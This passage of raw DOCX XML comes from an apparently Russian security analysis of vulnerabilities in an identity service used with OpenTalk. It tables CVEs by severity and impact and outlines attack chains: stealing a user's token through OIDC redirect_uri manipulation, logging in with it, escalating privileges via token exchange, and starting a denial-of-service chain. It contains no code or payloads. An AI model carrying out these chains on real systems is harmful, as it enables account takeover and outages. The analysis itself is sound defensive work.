          <w:p w14:paraId="672850C9" w14:textId="409F695B" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E3760B">
              <w:t>Вход, обход аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414482" w:rsidRPr="00E3760B" w14:paraId="4C7E8DB8" w14:textId="77777777" w:rsidTr="00C27C90">
        <w:trPr>
          <w:trHeight w:val="828"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BF0376F" w14:textId="5066893E" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00C27C90" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1668B4F7" w14:textId="0D6AC2CC" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00C27C90" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00414482" w:rsidRPr="00E3760B">
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00414482" w:rsidRPr="00E3760B">
              <w:t>2026-9704</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49F32DB7" w14:textId="69D3903E" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E3760B">
              <w:t>После</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="112D91FC" w14:textId="5DF6FCB8" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E3760B">
              <w:t>Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C46357C" w14:textId="3F389751" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E3760B">
              <w:t>Повышение привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414482" w:rsidRPr="00E3760B" w14:paraId="13541CEE" w14:textId="77777777" w:rsidTr="00C27C90">
        <w:trPr>
          <w:trHeight w:val="828"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66DD32A0" w14:textId="08ABFB93" w:rsidR="00414482" w:rsidRPr="00414482" w:rsidRDefault="00C27C90" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C7ABE0B" w14:textId="068C8D08" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00C27C90" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00414482" w:rsidRPr="00414482">
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00414482" w:rsidRPr="00414482">
              <w:t>2026-9803</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD963E4" w14:textId="04E2C345" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00E3760B">
              <w:t>После</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DDA0F00" w14:textId="52C44FDF" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Низкая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717E3F6D" w14:textId="6EEF45D4" w:rsidR="00414482" w:rsidRPr="00E3760B" w:rsidRDefault="00414482" w:rsidP="00E3760B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00002CDB">
              <w:t>Отказ в обслуживании</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4470D202" w14:textId="77777777" w:rsidR="00007589" w:rsidRDefault="00007589" w:rsidP="00F72134">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295F1A85" w14:textId="140608C3" w:rsidR="00BF5D8A" w:rsidRDefault="00BF5D8A" w:rsidP="00BF5D8A">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>Цепочка 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02592371" w14:textId="30C8934F" w:rsidR="00BA53F1" w:rsidRDefault="00BA53F1" w:rsidP="00BA53F1">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Первая цепочка демонстрирует возможность полной компрометации учётной записи легитимного пользователя без обладания какими-либо действительными учётными данными. Последовательность цепочки представлена в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref234284801 \r \h \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>таблице</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FF495" w14:textId="77777777" w:rsidR="00BA53F1" w:rsidRPr="00BA53F1" w:rsidRDefault="00BA53F1" w:rsidP="00BA53F1">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29974789" w14:textId="3DDA0AB6" w:rsidR="00C27C90" w:rsidRPr="00C27C90" w:rsidRDefault="00C27C90" w:rsidP="00C27C90">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Ref234284801"/>
      <w:r>
        <w:t>Последовательность действий 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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2"/>
        <w:gridCol w:w="2154"/>
        <w:gridCol w:w="1913"/>
        <w:gridCol w:w="1791"/>
        <w:gridCol w:w="2914"/>
      </w:tblGrid>
      <w:tr w:rsidR="00002CDB" w14:paraId="5928D2E7" w14:textId="77777777" w:rsidTr="00557FDB">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C944610" w14:textId="6C4E7DA0" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A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</w:rPr>
              <w:t>№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F508E42" w14:textId="29E389F2" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Этап эксплуатации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406E4787" w14:textId="19345B47" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Действие</w:t>
            </w:r>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">/CVE </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4BDDBD" w14:textId="68AC3AF2" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Условия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61BADFCE" w14:textId="2C4D5894" w:rsidR="00002CDB" w:rsidRPr="00C82B97" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A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  <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00002CDB" w14:paraId="1042EEDB" w14:textId="77777777" w:rsidTr="00002CDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FAB6AB4" w14:textId="72D20E23" w:rsidR="00002CDB" w:rsidRPr="00984FD9" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E29571A" w14:textId="24AB2E6E" w:rsidR="00002CDB" w:rsidRPr="00BF5D8A" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5D8A">
              <w:t>Обход аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72FF74A8" w14:textId="65340759" w:rsidR="00002CDB" w:rsidRPr="00BF5D8A" w:rsidRDefault="00C27C90" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00BF5D8A">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00BF5D8A">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-7504</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5287B5FE" w14:textId="197C086E" w:rsidR="00002CDB" w:rsidRPr="00E567F1" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">OIDC-клиент с </w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>redirect_uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2B46AB" w14:textId="6A64B491" w:rsidR="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Нарушитель без учётной записи манипулирует параметром </w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>URI</w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> перенаправления в потоке</w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00411926">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>OIDC и уводит токен легитимного пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00002CDB" w14:paraId="1445D481" w14:textId="77777777" w:rsidTr="00002CDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48C1ED0C" w14:textId="7F7558F6" w:rsidR="00002CDB" w:rsidRPr="00984FD9" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52AFCCD6" w14:textId="5CB117F9" w:rsidR="00002CDB" w:rsidRPr="00BF5D8A" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E567F1">
              <w:t>Вход в приложение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5201AA" w14:textId="6515ED9C" w:rsidR="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Полученный токен</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="151B1675" w14:textId="39225D16" w:rsidR="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E169B05" w14:textId="6B066676" w:rsidR="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind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В</w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">ход в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003A5828">
              <w:t>OpenTalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> от имени пользователя </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>через украденный токен</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00002CDB" w14:paraId="3451D1D5" w14:textId="77777777" w:rsidTr="00002CDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71B87550" w14:textId="53E2C622" w:rsidR="00002CDB" w:rsidRPr="00984FD9" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C796E61" w14:textId="39E09827" w:rsidR="00002CDB" w:rsidRPr="00BF5D8A" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E567F1">
              <w:t>Повышение привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1839" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698C63DD" w14:textId="5EC4F6DE" w:rsidR="00002CDB" w:rsidRDefault="00411926" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00002CDB" w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-9704</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD0A891" w14:textId="6C034994" w:rsidR="00002CDB" w:rsidRPr="00E567F1" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Включён </w:t>
            </w:r>
            <w:r w:rsidR="00411926">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Static T</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>oken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00002CDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>xchange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49E01350" w14:textId="7A9322E1" w:rsidR="00002CDB" w:rsidRDefault="00002CDB" w:rsidP="00BF5D8A">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Через обмен токенами</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>получ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>ение</w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> токен</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">а </w:t>
            </w:r>
            <w:r w:rsidRPr="00E567F1">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>с расширенными правами</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7317DA09" w14:textId="77777777" w:rsidR="00497FAD" w:rsidRDefault="00497FAD" w:rsidP="00002CDB">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B234EE9" w14:textId="04BFBA19" w:rsidR="00E567F1" w:rsidRDefault="00002CDB" w:rsidP="00002CDB">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r>
        <w:t>В результате</w:t>
      </w:r>
      <w:r w:rsidR="00BA53F1">
        <w:t xml:space="preserve"> действий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеем д</w:t>
      </w:r>
      <w:r w:rsidRPr="00002CDB">
        <w:t xml:space="preserve">оступ к привилегированным функциям </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C626441" w14:textId="77777777" w:rsidR="00411926" w:rsidRDefault="00411926" w:rsidP="00002CDB">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78931AD4" w14:textId="0C80AC49" w:rsidR="00411926" w:rsidRDefault="00E567F1" w:rsidP="00411926">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t>Цепочка 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493748E3" w14:textId="553CA486" w:rsidR="00411926" w:rsidRPr="00411926" w:rsidRDefault="00411926" w:rsidP="00411926">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00411926">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">торая цепочка не требует многошаговой эксплуатации и начального доступа. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимость </w:t>
      </w:r>
      <w:r w:rsidRPr="00411926">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">затрагивает доступность сервиса аутентификации целиком, что делает данный вектор критичным с точки зрения общей устойчивости платформы. Последовательность действий представлена в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234285018 \r \h \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
